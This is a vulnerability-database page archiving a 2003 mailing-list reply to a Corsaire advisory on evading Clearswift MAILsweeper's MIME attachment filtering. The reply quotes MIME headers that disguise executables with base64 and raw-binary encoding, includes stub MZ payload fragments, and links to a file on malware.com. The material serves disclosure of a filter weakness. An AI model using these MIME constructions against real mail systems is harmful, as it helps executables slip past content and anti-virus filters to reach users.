Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:4191
HistoryMar 12, 2003 - 12:00 a.m.

Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue

2003-03-1200:00:00
vulners.com
11
JSON

<!–

Step 2: Now create a text file that will be used to hold the MIME
encoded attachment. Start notepad (or another text editor), and
paste
in:

 MIME-Version: 1.0 
 Content-Location:file:///executable.exe 
 Content-Transfer-Encoding: base64 


 TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA 
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

–>

That's a very interesting situation with content filters and anti-
virus filters. How many others are affected one must wonder.

Try the following as well, nothing more than pure binary:

http://www.malware.com/bin.exe.zip

MIME-Version: 1.0
Content-Location:File://foo.exe
Content-Transfer-Encoding: binary

MZD  ! яяu  ™ >  ы0jr y
ћ

Lot more where that came from.

End Call


http://www.malware.com

JSON